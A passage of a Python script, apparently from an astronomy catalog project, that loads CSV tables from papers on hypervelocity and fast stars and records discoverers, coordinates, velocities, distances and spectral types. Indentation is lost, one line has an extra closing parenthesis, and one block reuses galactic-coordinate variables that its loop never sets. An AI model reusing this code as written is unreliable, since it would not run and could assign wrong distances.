FASTSTARS.SPECTRAL_TYPE, "O", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "sd", source=source)
elif SPTYPE == "BHB":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, SPTYPE, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
if str(row['ID'])[:3]=='HVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
catalog.journal_entries()
# 2012ApJ...744L..24L
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apjl415156t1t2.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
name, source = catalog.new_entry(oname, bibcode='2012ApJ...744L..24L')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Yinbi Li, Ali Luo, Gang Zhao, Youjun Lu, Juanjuan Ren, Fang Zuo', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2012), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "F", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2012ApJ...751...55B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj427101t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2012ApJ...751...55B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2012), source)
if name == 'SDSSJ112359.47+751807.73':
sourcewarren = catalog.entries[name].add_source(name='Warren R. Brown (private comm.)',secondary=True)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'B9', source=sourcewarren)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
if (oname!='US708') & (oname!='HE0437-5439'):
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['e_Vhel'])!='NA':
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
galrad = float(str(row['RGC']))
dhel = rgc_to_dhel(galrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), u_value='kpc', source=source, derived=True)
sptype = str(row['Type']).split('/')
for SPTYPE in sptype:
if SPTYPE != "NA":
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, SPTYPE, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
if str(row['ID'])[:3]=='HVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, row['ID'], source=source)
catalog.journal_entries()
# 2014ApJ...780....7P
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj485719t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'SDSS'+str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...780....7P')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Lauren E. Palladino, Katharine J. Schlesinger, Kelly Holley-Bockelmann, Carlos Allende Prieto, Timothy C. Beers, Young Sun Lee, Donald P. Schneider', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'Pal'+str(row['Pal']), source=source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "G", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "K", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2014ApJ...787...89B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj494602t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...787...89B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:19]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
if FASTSTARS.SPECTRAL_TYPE not in catalog.entries[name]:
sourceboubert = catalog.entries[name].add_source(bibcode='2018arXiv180410179B',secondary=True)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'A', source=sourceboubert)
catalog.entries[name].add_quantity(FASTSTARS.SPECTRAL_TYPE, 'B', source=sourceboubert)
galrad = float(str(row['RGC']))
errgalrad = float(str(row['e_RGC']))
dhel = rgc_to_dhel(galrad,gallon,gallat)
dhel_lo = rgc_to_dhel(galrad-errgalrad,gallon,gallat)
dhel_hi = rgc_to_dhel(galrad+errgalrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), e_lower_value=dhel-dhel_lo, e_upper_value=dhel_hi-dhel, u_value='kpc', source=source, derived=True)
if str(row['ID'])!='pBHVS':
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'HVS'+str(row['ID']), source=source)
if str(row['ID'])=='22':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
elif str(row['ID'])=='23':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
elif str(row['ID'])=='24':
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, "B", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.journal_entries()
# 2014EAS....67..255Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'1501.07824.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['ID'])
name, source = catalog.new_entry(oname, bibcode='2014EAS....67..255Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER, 'Y. Q. Zhang, M. C. Smith, J. L. Carlin', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radeg = str(row['ra'])
decdeg = str(row['dec'])
ra, dec = coord(ra=radeg*u.deg, dec=decdeg*u.deg).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source) # This distance may have some metallicity dependent uncertainty?
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...789L...2Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apjl496832t1t2t3_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['ID'])
name, source = catalog.new_entry(oname, bibcode='2014ApJ...789L...2Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Jing Zhong, Li Chen, Chao Liu, Richard de Grijs, Jinliang Hou, Shiyin Shen, Zhengyi Shao, Jing Li, Ali Luo, Jianrong Shi, Haotong Zhang, Ming Yang, Licai Deng, Ge Jin, Yong Zhang, Yonghui Hou, Zhenchao Zhang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['Catalog']), source=source)
radec = str(row['Catalog']).strip('J')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vrb']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), u_value='kpc', source=source) # This distance may have some metallicity dependent uncertainty?
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...794..146T
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'ApJ794146.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).replace(' ','')
name, source = catalog.new_entry(oname, bibcode='2014ApJ...794..146T')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Christopher A. Theissen, Andrew A. West', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2014ApJ...794..145S
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj501503t8_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = oname[:4]+'J'+oname[4:]
name, source = catalog.new_entry(oname, bibcode='2014ApJ...794..145S')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Antonia S. Savcheva, Andrew A. West, John J. Bochanski', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2014), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:8]+' '+radec[8:11]+' '+radec[11:13]+' '+radec[13:17]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
sptype = str(row['Type'])
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype[2:], source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "sd", source=source)
catalog.journal_entries()
# 2015MNRAS.447.2046H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'hawkins2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).strip(' ')
oname = 'RAVE'+oname
name, source = catalog.new_entry(oname, bibcode='2015MNRAS.447.2046H')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'K. Hawkins, G. Kordopatis, G. Gilmore, T. Masseron, R. F. G. Wyse, G. Ruchti, O. Bienaymé, J. Bland-Hawthorn, C. Boeche, K. Freeman, B. K. Gibson, E. K. Grebel, A. Helmi, A. Kunder, U. Munari, J. F. Navarro, Q. A. Parker, W. A. Reid, R. D. Scholz, G. Seabroke, A. Siebert, M. Steinmetz, F. Watson, T. Zwitter', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('RAVEJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:8]+' '+radec[8:11]+' '+radec[11:13]+' '+radec[13:15]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']).strip(' '), e_value=str(row['e_Vhel']).strip(' '), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']).strip(' '), e_value=str(row['e_pmra']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']).strip(' '), e_value=str(row['e_pmdec']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(row['Dhel'])/1e3).strip(' '), e_value=str(float(row['e_Dhel'])/1e3).strip(' '), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
catalog.journal_entries()
# 2015A&A...576L..14Z
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'zeigerer.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'Pal'+str(row['Pal'])
name, source = catalog.new_entry(oname, bibcode='2015A&A...576L..14Z')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'E. Ziegerer, M. Volkert, U. Heber, A. Irrgang, B. T. Gänsicke, S. Geier', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.journal_entries()
# 2015ApJ...804...49B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj510826t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog']).strip(' ')
if oname[1]==':':
# Add the leading 0
oname = '0'+oname
oname = 'SDSSJ'+oname
name, source = catalog.new_entry(oname.replace(':',''), bibcode='2015ApJ...804...49B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Jay Anderson, Oleg Y. Gnedin, Howard E. Bond, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']).strip(' '), e_value=str(row['e_pmra']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']).strip(' '), e_value=str(row['e_pmdec']).strip(' '), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']).strip(' '), e_value=str(row['e_Dhel']).strip(' '), u_value='kpc', source=source)
if str(row['newspec']) == 'y':
radec = oname.strip('SDSSJ')
ra, dec = radec[:11], radec[11:]
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
#catalog.entries[name].add_quantity(
# FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Type']), source=source)
catalog.journal_entries()
# 2015RAA....15.1364L
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'li2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'LAMOST'+oname
name, source = catalog.new_entry(oname, bibcode='2015RAA....15.1364L')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Yin-Bi Li, A.-Li Luo, Gang Zhao, You-Jun Lu, Peng Wei, Bing Du, Xiang Li, Yong-Heng Zhao, Zhan-Wen Han, Bo Wang, Yue Wu, Yong Zhang, Yong-Hui Hou, Yue-Fei Wang, Ming Yang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('LAMOSTJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'Li'+str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra']), e_value=str(row['e_pmra']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec']), e_value=str(row['e_pmdec']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'F', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'G', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2015AJ....150...77V
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'vickers2015final.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'SDSS'+oname
name, source = catalog.new_entry(oname, bibcode='2015AJ....150...77V')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'John J.Vickers, Martin C. Smith, Eva K. Grebel', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['distance']) != '':
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['distance']), u_value='kpc', source=source))
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'F', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'G', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'K', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2015ApJ...813...26F
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'favia2015.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
oname = 'SDSS'+oname
name, source = catalog.new_entry(oname, bibcode='2015ApJ...813...26F')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Andrej Favia, Andrew A. West, Christopher A. Theissen', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2015), source)
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, 'RdM'+str(row['ID']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_RA, str(row['pmra1']), e_value=str(row['e_pmra1']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.PROPER_MOTION_DEC, str(row['pmdec1']), e_value=str(row['e_pmdec1']), u_value='mas/yr', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(float(row['Dhel'])/1e3), e_value=str(float(row['e_Dhel'])/1e3), u_value='kpc', source=source)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, 'M'+str(row['Type']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
catalog.journal_entries()
# 2017ApJ...847L...9H
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'huang2017.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = str(row['Catalog'])
name, source = catalog.new_entry(oname, bibcode='2017ApJ...847L...9H')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Y. Huang, X.-W. Liu, H.-W. Zhang, B.-Q. Chen, M.-S. Xiang, C. Wang, H.-B. Yuan, Z.-J. Tian, Y.-B. Li, B. Wang', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2017), source)
radec = oname.strip('J')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.ALIAS, str(row['Alias']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(row['Dhel']), e_value=str(row['e_Dhel']), u_value='kpc', source=source)
sptype = str(row['Type'])
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, sptype[:2], source=source)
lumclass = sptype[2:].split('/')
for LC in lumclass:
if LC == "IV":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'sg', source=source)
elif LC == "V":
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, 'd', source=source)
# 2017MNRAS.470.1388M
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'marchetti2017.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'TYC '+str(row['Tycho 2 ID']).strip(' ')
name, source = catalog.new_entry(oname, bibcode='2017MNRAS.470.1388M')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'T. Marchetti, E. M. Rossi, G. Kordopatis, A. G. A. Brown, A. Rimoldi, E. Starkenburg, K. Youakim, R. Ashley', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2017), source)
sourcegaia = catalog.entries[name].add_source(bibcode='2016A&A...595A...2G')
radec = str(row['RADEC'])
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
